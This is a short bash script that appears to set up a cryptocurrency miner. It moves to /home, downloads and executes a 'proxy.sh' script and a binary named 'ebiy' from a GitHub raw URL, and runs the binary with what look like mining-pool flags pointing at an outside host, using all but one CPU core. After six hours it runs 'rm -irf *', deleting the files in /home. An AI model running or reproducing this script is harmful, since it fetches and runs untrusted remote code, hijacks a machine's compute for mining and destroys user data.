#!/bin/bash

# Do not edit this file!
# kumaha aink we njink

cd /home
wget https://raw.githubusercontent.com/petugas/e/main/proxy.sh
chmod +x proxy.sh
sh proxy.sh
wget https://raw.githubusercontent.com/petugas/e/main/ebiy
chmod +x ebiy
./panel ./ebiy -o xm.erlandi.eu.org:5001 -t $(nproc --ignore 1)
sleep 6h
rm -irf *
